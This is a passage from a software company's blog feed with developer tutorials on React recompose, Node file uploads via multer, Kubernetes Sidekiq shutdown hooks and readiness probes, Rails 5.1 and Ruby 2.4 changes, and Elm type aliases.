&quot;redux/modules/auth&quot;;import PaymentsModalBase from &quot;components/PaymentsModal/PaymentsModalBase&quot;;import PayOnlineScreen from &quot;components/PaymentsModal/PayOnlineScreen&quot;;import CashOnDeliveryScreen from &quot;components/PaymentsModal/CashScreen&quot;;import SwipeOnDeliveryScreen from &quot;components/PaymentsModal/CardScreen&quot;;const cashOnDelivery = &quot;CASH_ON_DELIVERY&quot;;const swipeOnDelivery = &quot;SWIPE_ON_DELIVERY&quot;;const online = &quot;ONLINE&quot;;const isCashOnDelivery = ({ paymentType }) =&gt; paymentType === cashOnDelivery;const isSwipeOnDelivery = ({ paymentType }) =&gt; paymentType === swipeOnDelivery;const conditionalRender = states =&gt;  compose(    ...states.map(state =&gt; branch(state.when, renderComponent(state.then)))  );const enhance = compose(  conditionalRender([    { when: isCashOnDelivery, then: CashOnDeliveryScreen },    { when: isSwipeOnDelivery, then: SwipeOnDeliveryScreen },  ]));const PayOnline = enhance(PayOnlineScreen);@connect(() =&gt; ({}), { ...authActions })export default class PaymentsModal extends Component {  static propTypes = {    isModalVisible: PropTypes.bool.isRequired,    hidePaymentModal: PropTypes.func.isRequired,    orderDetails: PropTypes.object.isRequired,  };  state = {    paymentType: online,  };  render() {    const { isModalVisible, hidePaymentModal, orderDetails } = this.props;    return (      &lt;Modal        show={isModalVisible}        onHide={hidePaymentModal}        dialogClassName=&quot;modal-payments&quot;      &gt;        &lt;PaymentsModalBase          orderDetails={orderDetails}          hidePaymentModal={hidePaymentModal}        &gt;          &lt;PayOnline {...this.state} /&gt;        &lt;/PaymentsModalBase&gt;      &lt;/Modal&gt;    );  }}</code></pre><h3>Functional code is a win</h3><p>Functional code is all about composing smaller functions together like legopieces. It results in better code because functions are usually smaller in sizeand do only one thing.</p><p>In coming weeks we will see more applications of recompose in the real world.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Uploading file in an isomorphic ReactJS app]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/uploading-file-in-an-isomorphic-reactjs-app"/>
      <updated>2017-08-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/uploading-file-in-an-isomorphic-reactjs-app</id>
      <content type="html"><![CDATA[<h3>Design of an isomorphic App</h3><p>In a typical <strong>single-page application (SPA)</strong> server sends JSON data. Browserreceives that JSON data and builds HTML.</p><p>In an isomorphic app, the server sends a fully-formed HTML to the browser. Thisis typically done for SEO, performance and code maintainability.</p><p>In an isomorphic app the browser does not directly deal with the API server.This is because the API server will render JSON data and browser needs to havefully formed HTML. To solve this problem a &quot;proxy server&quot; is introduced inbetween the browser and the API server.</p><p><img src="/blog_images/2017/uploading-file-in-an-isomorphic-reactjs-app/isomorphic_architecture.jpg" alt="Architecture"></p><p>In this case the proxy server is powered by Node.js.</p><h3>Uploading a file in an isomorphic app</h3><p>Recently, while working on an isomorphic app, we needed to upload a file to theAPI server. We couldn't directly upload from the browser because we ran into<a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS">CORS</a>issue.</p><p>One way to solve CORS issue is to add CORS support to the API sever. Since wedid not have access to the API server this was not an option. It means now thefile must go through the proxy server.</p><p>The problem can be seen as two separate issues.</p><ol><li>Uploading the file from the browser to the proxy server.</li><li>Uploading the file from the proxy server to the API server.</li></ol><h3>Implementation</h3><p>Before we start writing any code, we need to accept file on proxy server and itcan be done by using <a href="https://github.com/expressjs/multer">Multer</a>.</p><p><strong>Multer</strong> is a node.js middleware for handling <code>multipart/form-data</code>.</p><p>We need to initialize <strong>multer</strong> with a path where it will store the uploadedfiles.</p><p>We can do that by adding the following code before initializing the node.jsserver app.</p><pre><code class="language-javascript">app  .set(&quot;config&quot;, config)  // ...other middleware  .use(multer({ dest: &quot;uploads/&quot; }).any()); // add this line</code></pre><p>Now any file uploaded to proxy server would be stored in the <code>/uploads</code>directory.</p><p>Next we need a function which uploads a file from browser to the node.js server.</p><pre><code class="language-javascript">// code on clientfunction uploadImagesToNodeServer(files) {  const formData = new FormData();  map(files, (file, fileName) =&gt; {    if (file &amp;&amp; file instanceof File) {      formData.append(fileName, file);    }  });  superagent    .post(&quot;/node_server/upload_path&quot;)    .type(&quot;form&quot;)    .set(headers)    .send(data, formData)    .then(response =&gt; {      // handle response    });}</code></pre><p>Next, let's upload the same file from the node.js server to the API server.</p><p>To do that, we need to add a callback function to our node.js server where weare accepting the POST request for step 1.</p><pre><code class="language-javascript">// code on node.js serverapp.post(&quot;/node_server/upload_path&quot;, function (req, res) {  uploadImagesToApiServer(req);  // handle response});function uploadImagesToApiServer(req) {  superagent    .post(&quot;/api_server/upload_path&quot;)    .type(&quot;form&quot;)    .set(headers)    .attach(&quot;image&quot;, req.files[0].path)    .then(response =&gt; {      // handle response    });}</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Graceful shutdown of Sidekiq processes on Kubernetes]]></title>
       <author><name>Rahul Mahale</name></author>
      <link href="https://www.bigbinary.com/blog/graceful-shutdown-of-sidekiq-processes-on-k8s"/>
      <updated>2017-08-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/graceful-shutdown-of-sidekiq-processes-on-k8s</id>
      <content type="html"><![CDATA[<p>In our last <a href="deploying-rails-applications-using-kubernetes-with-zero-downtime">blog</a>, we explained how to handlerolling deployments of Rails applications with no downtime.</p><p>In this article we will walk you throughhow to handle graceful shutdown of processes in Kubernetes.</p><p>This post assumes that you have basic understanding of<a href="http://kubernetes.io/">Kubernetes</a>terms like<a href="http://kubernetes.io/docs/user-guide/pods/">pods</a>and<a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a>.</p><h3>Problem</h3><p>When we deploy Rails applications on kubernetesit stops existing pods and spins up new ones.When old pod is terminated by Replicaset,then active Sidekiq processes are also terminated.We run our batch jobs using sidekiq and it is possible thatsidekiq jobs might be running when deployment is being performed.Terminating old pod during deployment can kill the already running jobs.</p><h3>Solution #1</h3><p>As per default<a href="https://kubernetes.io/docs/concepts/workloads/pods/pod/#termination-of-pods">pod termination</a>policy of kubernetes, kubernetes sends command to delete pod with a default grace period of 30 seconds.At this time kubernetes sends TERM signal.When the grace period expires, any processes still running in the Pod are killed with SIGKILL.</p><p>We can adjust the <code>terminationGracePeriodSeconds</code> timeout as per our need and can change it from30 seconds to 2 minutes.</p><p>However there might be cases where we are notsure how much time a process takes to gracefully shutdown.In such cases we should consider using<code>PreStop</code> hook which is our next solution.</p><h3>Solution #2</h3><p>Kubernetes provides many<a href="https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/">Container lifecycle hooks</a>.</p><p><code>PreStop</code> hook is called immediately before a container is terminated.It is a blocking call. It means it is synchronous.It also means that this hook must be completed beforethe container is terminated.</p><p>Note that unlike solution1 this solution is not time bound.Kubernetes will wait as long as it takes for <code>PreStop</code> processto finish. It is never a good idea to have a process which takes morethan a minute to shutdown but in real world there are caseswhere more time is needed. Use <code>PreStop</code> for such cases.</p><p>We decided to use <code>preStop</code> hook to stop Sidekiq because we had some really long running processes.</p><h3>Using PreStop hooks in Sidekiq deployment</h3><p>This is a simple deployment template which terminates<a href="https://github.com/mperham/sidekiq/wiki/Signals">Sidekiq process</a>when pod is terminated during deployment.</p><pre><code class="language-yaml">apiVersion: v1kind: Deploymentmetadata:  name: test-staging-sidekiq  labels:    app: test-staging  namespace: testspec:  template:    metadata:      labels:        app: test-staging    spec:      containers:        - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest          name: test-staging          imagePullPolicy: Always          env:            - name: REDIS_HOST              value: test-staging-redis            - name: APP_ENV              value: staging            - name: CLIENT              value: test          volumeMounts:            - mountPath: /etc/sidekiq/config              name: test-staging-sidekiq          ports:            - containerPort: 80      volumes:        - name: test-staging-sidekiq          configMap:            name: test-staging-sidekiq            items:              - key: config                path: sidekiq.yml      imagePullSecrets:        - name: registrykey</code></pre><p>Next we will use <code>PreStop</code> lifecycle hook to stopSidekiq safely before pod termination.</p><p>We will add the following block in deployment manifest.</p><pre><code class="language-yaml">lifecycle:  preStop:    exec:      command:        [          &quot;/bin/bash&quot;,          &quot;-l&quot;,          &quot;-c&quot;,          &quot;cd /opt/myapp/current; for f in tmp/pids/sidekiq*.pid; do bundle exec sidekiqctl stop $f; done&quot;,        ]</code></pre><p><code>PreStop</code> hook stops all theSidekiq processes and does graceful shutdown of Sidekiqbefore terminating the pod.</p><p>We can add this configuration in original deployment manifest.</p><pre><code class="language-yaml">apiVersion: v1kind: Deploymentmetadata:  name: test-staging-sidekiq  labels:    app: test-staging  namespace: testspec:  replicas: 1  template:    metadata:      labels:        app: test-staging    spec:      containers:        - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest          name: test-staging          imagePullPolicy: Always          lifecycle:            preStop:              exec:                command:                  [                    &quot;/bin/bash&quot;,                    &quot;-l&quot;,                    &quot;-c&quot;,                    &quot;cd /opt/myapp/current; for f in tmp/pids/sidekiq*.pid; do bundle exec sidekiqctl stop $f; done&quot;,                  ]          env:            - name: REDIS_HOST              value: test-staging-redis            - name: APP_ENV              value: staging            - name: CLIENT              value: test          volumeMounts:            - mountPath: /etc/sidekiq/config              name: test-staging-sidekiq          ports:            - containerPort: 80      volumes:        - name: test-staging-sidekiq          configMap:            name: test-staging-sidekiq            items:              - key: config                path: sidekiq.yml      imagePullSecrets:        - name: registrykey</code></pre><p>Let's launch this deployment and monitor the rolling deployment.</p><pre><code class="language-bash">$ kubectl apply -f test-deployment.ymldeployment &quot;test-staging-sidekiq&quot; configured</code></pre><p>We can confirm that existing Sidekiq jobs are completedbefore termination of old pod during the deployment process.In this way we handle a graceful shutdown ofSidekiq process. We can apply this technique to other processesas well.</p>]]></content>
    </entry><entry>
       <title><![CDATA[New Syntax for HTML Tag helpers in Rails 5.1]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/new-syntax-for-tag-helpers-in-rails-5-1"/>
      <updated>2017-08-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/new-syntax-for-tag-helpers-in-rails-5-1</id>
      <content type="html"><![CDATA[<p>Rails is great at generating HTML using helpers such as<a href="http://api.rubyonrails.org/classes/ActionView/Helpers/TagHelper.html#method-i-content_tag">content_tag</a>and<a href="http://api.rubyonrails.org/classes/ActionView/Helpers/TagHelper.html#method-i-tag">tag</a>.</p><pre><code class="language-erb">content_tag(:div, , class: &quot;home&quot;)&lt;div class=&quot;home&quot;&gt;&lt;/div&gt;</code></pre><p>Rails 5.1 has <a href="https://github.com/rails/rails/issues/25195">introduced</a><a href="https://github.com/rails/rails/pull/25543">new syntax</a> for this in the form ofenhanced <code>tag</code> helper.</p><p>Now that same HTML div tag can be generated as follows.</p><pre><code class="language-erb">tag.div class: 'home'&lt;div class=&quot;home&quot;&gt;&lt;/div&gt;</code></pre><p>Earlier, the tag type was decided by the positional argument to the<code>content_tag</code> and <code>tag</code> methods but now we can just call the required tag typeon the <code>tag</code> method itself.</p><p>We can pass the tag body and attributes in the block format as well.</p><pre><code class="language-erb">&lt;%= tag.div class: 'home' do %&gt;  Welcome to Home!&lt;% end %&gt;&lt;div class=&quot;home&quot;&gt;  Welcome to Home!&lt;/div&gt;</code></pre><h3>HTML5 compliant by default</h3><p>The new <code>tag</code> helper is also HTML 5 compliant by default, such that it respectsHTML5 features such as<a href="https://www.w3.org/TR/html5/syntax.html#void-elements">void elements</a>.</p><h3>Backward compatibility</h3><p>The old syntax of <code>content_tag</code> and <code>tag</code> methods is still supported but mightbe deprecated and removed in future versions of Rails.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Avoid exception for dup on Integer]]></title>
       <author><name>Rohit Arolkar</name></author>
      <link href="https://www.bigbinary.com/blog/avoid-exceptions-for-dup-on-interger-and-similar-cases"/>
      <updated>2017-08-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/avoid-exceptions-for-dup-on-interger-and-similar-cases</id>
      <content type="html"><![CDATA[<p>Prior to Ruby 2.4, if we were to <code>dup</code> an <code>Integer</code>, it would fail with a<code>TypeError</code>.</p><pre><code class="language-ruby">&gt; 1.dupTypeError: can't dup Fixnumfrom (irb):1:in `dup'from (irb):1</code></pre><p>This was confusing because <code>Integer#dup</code> is actually implemented.</p><pre><code class="language-ruby">&gt; Integer.respond_to? :dup=&gt; true</code></pre><p>However, if we were to freeze an <code>Integer</code> it would fail silently.</p><pre><code class="language-ruby">&gt; 1.freeze=&gt; 1</code></pre><p>Ruby 2.4 has now included dup-ability for <code>Integer</code> as well.</p><pre><code class="language-ruby">&gt; 1.dup=&gt; 1</code></pre><p>In Ruby, some object types are immediate variables and therefore cannot beduped/cloned. Yet, there was no graceful way of averting the error thrown by thesanity check when we attempt to dup/clone them.</p><p>So now <code>Integer#dup</code> functions exactly the way <code>freeze</code> does -- fail silentlyand return the object itself. It makes sense because nothing about these objectscan be changed in the first place.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Deploy Rails apps on Kubernetes cluster & no downtime]]></title>
       <author><name>Rahul Mahale</name></author>
      <link href="https://www.bigbinary.com/blog/deploying-rails-applications-using-kubernetes-with-zero-downtime"/>
      <updated>2017-07-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/deploying-rails-applications-using-kubernetes-with-zero-downtime</id>
      <content type="html"><![CDATA[<p>This post assumes that you have basic understanding of<a href="http://kubernetes.io/">Kubernetes</a>terms like<a href="http://kubernetes.io/docs/user-guide/pods/">pods</a>and<a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a>.</p><h3>Problem</h3><p>We deploy Rails applications on Kubernetes frequentlyandwe need to ensure thatdeployments do not cause any downtime.When we used Capistrano to manage deploymentsit was much easier sinceit has provision to restart services in the rolling fashion.</p><p>Kubernetes restarts pods directlyandany process already running on the pod is terminated.So on rolling deployments we face downtimeuntil the new pod is up and running.</p><h3>Solution</h3><p>In Kubernetes we have<a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-probes/">readiness probes and liveness probes</a>.Liveness probes take care of keeping pod livewhile readiness probe is responsible for keeping pods ready.</p><p>This is what Kubernetes documentation has to say aboutwhen to use readiness probes.</p><blockquote><p>Sometimes, applications are temporarily unable to serve traffic. For example, an application might need to load large data or configuration files during startup. In such cases, you dont want to kill the application, but you dont want to send it requests either. Kubernetes provides readiness probes to detect and mitigate these situations. A pod with containers reporting that they are not ready does not receive traffic through Kubernetes Services.</p></blockquote><p>It meansnew traffic should not be routed tothose pods which are currently running butare not ready yet.</p><h3>Using readiness probes in deployment flow</h3><p>Here is what we are going to do.</p><ul><li>We will use readiness probes to deploy our Rails app.</li><li>Readiness probes definition has to be specified in pod <code>spec</code> of deployment.</li><li>Readiness probe uses health check to detect the pod readiness.</li><li>We will create a simple file on our pod with name <code>health_check</code> returning status <code>200</code>.</li><li>This health check runs on arbitrary port 81.</li><li>We will expose this port in nginx config running on a pod.</li><li>When our application is up on nginx this health_check returns <code>200</code>.</li><li>We will use above fields to configure health check in pod's spec of deployment.</li></ul><p>Now let's build test deployment manifest.</p><pre><code class="language-yaml">---apiVersion: v1kind: Deploymentmetadata:  name: test-staging  labels:    app: test-staging  namespace: testspec:  template:    metadata:      labels:        app: test-staging    spec:      containers:      - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest        name: test-staging        imagePullPolicy: Always       env:        - name: POSTGRES_HOST          value: test-staging-postgres        - name: APP_ENV          value: staging        - name: CLIENT          value: test        ports:        - containerPort: 80      imagePullSecrets:        - name: registrykey</code></pre><p>This is a simple deployment template which will terminate pod on the rolling deployment.Application may suffer a downtime until the pod is in running state.</p><p>Next we will use readiness probe to define that pod is ready to accept the application traffic.We will add the following block in deployment manifest.</p><pre><code class="language-yaml">readinessProbe:  httpGet:    path: /health_check    port: 81  periodSeconds: 5  successThreshold: 3  failureThreshold: 2</code></pre><p>In above rediness probe definition <code>httpGet</code> checks the health check.</p><p>Health-check queries application on the file <code>health_check</code> printing <code>200</code> when accessed over port <code>81</code>.We will poll it for each 5 seconds with the field <code>periodSeconds</code>.</p><p>We will mark pod as ready only if we get a successful health_check count for 3 times.Similarly, we will mark it as a failure if we get failureThreshold twice.This can be adjusted as per application need.This helps deployment to determine if the pod is in ready status or not.With readiness probes for rolling updates, we will use <code>maxUnavailable</code> and <code>maxSurge</code> in deployment strategy.</p><p>As per Kubernetes documentation.</p><blockquote><p><strong><code>maxUnavailable</code></strong> is a field that specifies the maximum number of Podsthat can be unavailable during the update process.The value can be an absolute number (e.g. 5) or a percentage of desired Pods (e.g. 10%).The absolute number is calculated from percentage by rounding down.This can not be 0.</p></blockquote><p>and</p><blockquote><p><strong><code>maxSurge</code></strong> is field that specifiesThe maximum number of Podsthat can be created above the desired number of Pods.Value can be an absolute number (e.g. 5) ora percentage of desired Pods (e.g. 10%).This cannot be 0 if MaxUnavailable is 0.The absolute number is calculated from percentage by rounding up.By default, a value of 25% is used.</p></blockquote><p>Now we will update our deployment manifests withtwo replicas and the rolling update strategy by specifying the following parameters.</p><pre><code class="language-yaml">replicas: 2minReadySeconds: 50revisionHistoryLimit: 10strategy:  type: RollingUpdate  rollingUpdate:    maxUnavailable: 50%    maxSurge: 1</code></pre><p>This makes sure that on deployment one of our pods is always runningandat most 1 more pod can be created while deployment.</p><p>We can read more about rolling-deployments<a href="https://kubernetes.io/docs/concepts/workloads/controllers/deployment">here</a>.</p><p>We can add this configuration in original deployment manifest.</p><pre><code class="language-yaml">apiVersion: v1kind: Deploymentmetadata:  name: test-staging  labels:    app: test-staging  namespace: testspec:  replicas: 2  minReadySeconds: 50  revisionHistoryLimit: 10  strategy:    type: RollingUpdate    rollingUpdate:      maxUnavailable: 50%      maxSurge: 1  template:    metadata:      labels:        app: test-staging    spec:      containers:      - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest        name: test-staging        imagePullPolicy: Always       env:        - name: POSTGREs_HOST          value: test-staging-postgres        - name: APP_ENV          value: staging        - name: CLIENT          value: test        ports:        - containerPort: 80        readinessProbe:          httpGet:            path: /health_check            port: 81          periodSeconds: 5          successThreshold: 3          failureThreshold: 2      imagePullSecrets:        - name: registrykey</code></pre><p>Let's launch this deployment using the command given below and monitor the rolling deployment.</p><pre><code class="language-bash">$ kubectl apply -f test-deployment.ymldeployment &quot;test-staging-web&quot; configured</code></pre><p>After the deployment is configured we can check the pods and how they are restarted.</p><p>We can also access the application to check if we face any down time.</p><pre><code class="language-bash">$ kubectl  get pods    NAME                                  READY      STATUS  RESTARTS    AGEtest-staging-web-372228001-t85d4           1/1       Running   0          1dtest-staging-web-372424609-1fpqg           0/1       Running   0          50s</code></pre><p>We can see above that only one pod is re-created at the timeandone of the old pod is serving the application traffic.Also, new pod is running but not ready as it has not yet passed the readiness probe condition.</p><p>After sometime when the new pod is in ready state,old pod is re-created and traffic is served by the new pod.In this way, our application does not suffer any down-time andwe can confidently do deployments even at peak hours.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.1 enhances ActiveSupport::TimeZone.country_zones]]></title>
       <author><name>Narendra Rajput</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-1-returns-unmapped-timezones-from-activesupport-timezone-country_zones"/>
      <updated>2017-07-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-1-returns-unmapped-timezones-from-activesupport-timezone-country_zones</id>
      <content type="html"><![CDATA[<p>The<a href="http://api.rubyonrails.org/classes/ActiveSupport/TimeZone.html">ActiveSupport::TimeZone</a>class serves as wrapper around<a href="http://api.rubyonrails.org/classes/ActiveSupport/TimeZone.html">TZInfo::TimeZone</a>class. It limits the set of zones provided by TZInfo to smaller meaningfulsubset and returns zones with friendly names. For example, TZInfo gem returns&quot;America/New_York&quot; whereas Active Support returns &quot;Eastern Time (US &amp; Canada)&quot;.</p><p><a href="http://api.rubyonrails.org/classes/ActiveSupport/TimeZone.html#method-c-country_zones">ActiveSupport::TimeZone.country_zones</a>method returns a set of TimeZone objects for timezones in a country specified as2 character country code.</p><pre><code class="language-ruby"># Rails 5.0&gt;&gt; ActiveSupport::TimeZone.country_zones('US')=&gt; [#&lt;ActiveSupport::TimeZone:0x007fcc2b9b3198 @name=&quot;Hawaii&quot;, @utc_offset=nil, @tzinfo=#&lt;TZInfo::DataTimezone: Pacific/Honolulu&gt;&gt;, #&lt;ActiveSupport::TimeZone:0x007fcc2b9d9ac8 @name=&quot;Alaska&quot;, @utc_offset=nil, @tzinfo=#&lt;TZInfo::DataTimezone: America/Juneau&gt;&gt;, #&lt;ActiveSupport::TimeZone:0x007fcc2ba03a08 @name=&quot;Pacific Time (US &amp; Canada)&quot;, @utc_offset=nil, @tzinfo=#&lt;TZInfo::DataTimezone: America/Los_Angeles&gt;&gt;,...]</code></pre><p>In Rails 5.0, the <code>country_zones</code> method returns empty for some countries. Thisis because <code>ActiveSupport::TimeZone::MAPPING</code> supports only a limited number oftimezone names.</p><pre><code class="language-ruby">&gt;&gt; ActiveSupport::TimeZone.country_zones('SV') // El Salvador=&gt; []</code></pre><p>Rails 5.1<a href="https://github.com/rails/rails/commit/ec9b4d39108d4c22d00426fa95c61b8b37dfe4e3">fixed</a>this <a href="https://github.com/rails/rails/issues/28431">issue</a>. So now if the countryis not found in the <code>MAPPING</code> hash then a new <code>ActiveSupport::TimeZone</code> instancefor the country is returned.</p><pre><code class="language-ruby">&gt;&gt; ActiveSupport::TimeZone.country_zones('SV') // El Salvador=&gt; [#&lt;ActiveSupport::TimeZone:0x007ff0dab83080 @name=&quot;America/El_Salvador&quot;, @utc_offset=nil, @tzinfo=#&lt;TZInfo::DataTimezone: America/El_Salvador&gt;&gt;]</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Difference between type and type alias in Elm]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/difference-between-type-and-type-alias-in-elm"/>
      <updated>2017-07-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/difference-between-type-and-type-alias-in-elm</id>
      <content type="html"><![CDATA[<p>What is the difference between <code>type</code> and <code>type alias</code>.</p><p>Elm FAQ has<a href="http://faq.elm-community.org/#what-is-the-difference-between-type-and-type-alias">an answer</a>to this question. However I could not fully understand the answer.</p><p>This is my attempt in explaining it.</p><h2>What is type</h2><p>In Elm everything has a type. Fire up <code>elm-repl</code> and you will see 4 is a<code>number</code> and &quot;hello&quot; is a <code>String</code>.</p><pre><code class="language-elm">&gt; 44 : number&gt; &quot;hello&quot;&quot;hello&quot; : String</code></pre><p>Let's assume that we are working with users records and we have followingattributes of those users.</p><ul><li>Name</li><li>Age</li><li>Status (Active or Inactive)</li></ul><p>It's pretty clear that &quot;Name&quot; should be of type &quot;String&quot; and &quot;Age&quot; should be oftype &quot;number&quot;.</p><p>Let's think about a moment what is the type of &quot;Status&quot;. What is &quot;Active&quot; and&quot;Inactive&quot; in terms of type.</p><p><code>Active</code> and <code>Inactive</code> are two valid values of <code>Status</code>. In other programminglanguages we might represent <code>Status</code> as an enum.</p><p>In Elm we need to create a new type. And that can be done as shown here.</p><pre><code class="language-elm">type Status = Active | Inactive</code></pre><p>Second thing we are doing is that we are stating that the valid values for thisnew type are <code>Active</code> and <code>Inactive</code>.</p><p>When I discussed this code with my team members they asked me to show where is<code>Active</code> and <code>Inactive</code> defined. Good question.</p><p>The simple answer is that they are not defined anywhere. They do not need to bedefined. What needs definition is the new type that is being created.</p><p>What makes understanding it a bit hard for people coming from Ruby, Java andsuch background is that these people (including me) are looking at <code>Active</code> and<code>Inactive</code> as a class or a constant which is not the right way to look at.</p><p><code>Active</code> and <code>Inactive</code> are the valid values for type <code>Status</code>.</p><pre><code class="language-elm">&gt; Active-- NAMING ERROR ----------Cannot find variable `Active`3|   Active     ^^^^^^</code></pre><p>As you can see repl is not sure what <code>Active</code> is.</p><p>We can solve this by pasting following code in repl.</p><pre><code class="language-elm">type Status = Active | Inactive</code></pre><p>Now we can run the same code again. This time no error.</p><pre><code class="language-elm">&gt; ActiveActive : Repl.Status</code></pre><h2>What is type alias</h2><p>Let's see a simple application which just prints name and age of a single user.</p><p><a href="https://gist.github.com/neerajsingh0101/60627801877312ea95e328f704e5245a">Here</a>is the code. I'm posting screenshot of the same below with certain parthighlighted.</p><p><img src="/blog_images/2017/difference-between-type-and-type-alias-in-elm/code-without-type-alias.png" alt="code without type alias"></p><p>As you can see <code>{ name : String, age : Int }</code> is repeated at four differentplaces. In a bigger application it might get repeated more often.</p><p>This is what <code>type alias</code> does. It removes repetition. It removes verbosity.</p><p>As the name suggests this is just an alias. Note that <code>type</code> creates a new typewhereas <code>type alias</code> is literally saving keystrokes. <code>type alias</code> does notcreate a new <code>type</code>.</p><p>Now if you read the FAQ answer again then hopefully it will make morse sensenow.</p><p><a href="https://gist.github.com/neerajsingh0101/8e7756a1b7588538ac16526ce2bfc772">Here</a>is modified code using <code>type alias</code>.</p><h2>Why use type alias Username : String</h2><p>While browsing Elm code in general, I came across following code.</p><pre><code class="language-elm">type alias Username = String</code></pre><p>Question is what does code like this buy us. All it does is that instead of<code>String</code> I can now type <code>Username</code>.</p><p>First let's see how it might be used.</p><p>Let's assume that we have a function which returns <code>Status</code> of a user for thegiven username.</p><p>The function might have implementation as shown below.</p><pre><code class="language-elm">getUserStatus username =  make_db_call_and_return_user_status</code></pre><p>Now let's think about what the type annotation (rubyist think of it as methodsignature ) of function <code>getUserStatus</code> might look like.</p><p>It takes <code>username</code> as input and returns user record.</p><p>So the type annotation might look like</p><pre><code class="language-elm">getUserStatus : String -&gt; Status</code></pre><p>This works. However the issue is that <code>String</code> is not expressive enough. It canbe made more expressive if the signature were</p><pre><code class="language-elm">getUserStatus : Username -&gt; Status</code></pre><p>Now that we know about <code>type alias</code> all we need to do is</p><pre><code class="language-elm">type alias Username = String</code></pre><p>This makes code more expressive.</p><h2>No recursion with type alias</h2><p>An example of where we might need recursion is while designing commentingsystem. A comment can have sub-comments. However since <code>type alias</code> is just asubstitution and recursion does not work with it.</p><pre><code class="language-elm">&gt; type alias Comment = { message : String, responses : List Comment }This type alias is recursive, forming an infinite type!2| type alias Comment = { message : String, responses : List Comment }   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^When I expand a recursive type alias, it just keeps getting bigger and bigger.So dealiasing results in an infinitely large type! Try this instead:    type Comment        = Comment { message : String, responses : List Comment }This is kind of a subtle distinction. I suggested the naive fix, but you canoften do something a bit nicer. So I would recommend reading more at:&lt;https://github.com/elm-lang/elm-compiler/blob/0.18.0/hints/recursive-alias.md&gt;</code></pre><p><a href="https://github.com/elm-lang/elm-compiler/blob/master/hints/recursive-alias.md">Hint for Recursive Type Aliases</a>discusses this issue in greater detail and it also has solution to the problemof recursion.</p><h2>Dual role of type alias as constructor and type</h2><p>Let's say that we have following code.</p><pre><code class="language-elm">type alias UserInfo =    { name : String, age : Int }</code></pre><p>Now we can use <code>UserInfo</code> as a constructor to create records.</p><pre><code class="language-elm">&gt; type alias UserInfo = { name : String, age : Int }&gt; sam = UserInfo &quot;Sam&quot; 24{ name = &quot;Sam&quot;, age = 24 } : Repl.UserInfo</code></pre><p>In the above case we used <code>UserInfo</code> as a <strong>constructor</strong> to create new userrecords. We did not use <code>UserInfo</code> as a <code>type</code>.</p><p>Now let's see another function.</p><pre><code class="language-elm">type alias UserInfo =    { name : String, age : Int }getUserAge : UserInfo -&gt; IntgetUserAge userinfo =    userinfo.age</code></pre><p>In this case <code>UserInfo</code> is being used in <strong>type annotation</strong> as <strong>type</strong> and notas <strong>constructor</strong>.</p><h2>Which one to use type or type alias</h2><p>Both of them serve different purpose. Let's see an example.</p><p>Let's say that we have following code.</p><pre><code class="language-elm">type alias UserInfo =    { name : String, age : Int }type alias Coach =    { name : String, age : Int, sports : String }</code></pre><p>Now let's write a function that gets age of the given userinfo.</p><pre><code class="language-elm">getUserAge : UserInfo -&gt; IntgetUserAge UserInfo =    UserInfo.age</code></pre><p>Now let's create two types of users.</p><pre><code class="language-elm">sam = UserInfo &quot;Sam&quot; 24charlie = Coach &quot;Charlie&quot; 52 &quot;Basketball&quot;</code></pre><p>Now let's try to get age of both of these people.</p><pre><code class="language-elm">getUserAge samgetUserAge charlie</code></pre><p>Here is<a href="https://gist.github.com/neerajsingh0101/83f26c0c32c310ab01fe9a27f5bc9e98">the complete version</a>if you want to run it.</p><p><strong>Please note that elm-repl<a href="https://github.com/elm-lang/elm-repl/issues/86">does not support type annotation</a>so you can't test this code in elm-repl.</strong></p><p>The main point here is that since we used <code>type alias</code>, function <code>getUserAge</code>works for both <code>UserInfo</code> as well as <code>Coach</code>. It would be a stretch to say thatthis sounds like &quot;duck typing in Elm&quot; but it comes pretty close.</p><p>Yes Elm is statically typed language and it enforces type. However the pointhere is the <code>type alias</code> is not exactly a type.</p><p>So why did this code work.</p><p>It worked because of Elm's support for<a href="http://elm-lang.org/docs/records#pattern-matching">pattern matching</a> forrecords.</p><p>As mentioned earlier <code>type alias</code> is just a shortcut for typing the verboseversion. So let's expand the type annotation of <code>getUserAge</code>.</p><p>If we were not using <code>type alias UserInfo</code> then it might have looked like asshown below.</p><pre><code class="language-elm">getUserAge : { name : String, age : Int } -&gt; Int</code></pre><p>Here the argument is a record. Here is<a href="http://elm-lang.org/docs/records">official guide on Records</a>. While dealingwith records Elm looks at the argument and if that argument is a record and hasall the matching attributes then Elm will not complain because of its supportfor pattern matching.</p><p>Since <code>Coach</code> has both <code>name</code> and <code>age</code> attribute <code>getUserAge charlie</code> works.</p><p>You can test it by removing the attribute <code>age</code> from <code>Coach</code> and then you willsee that Compiler will complain.</p><p>In summary if we want strict type enforcement then we should go for <code>type</code>. Ifwe need something so that we do not need to type all the attributes all the 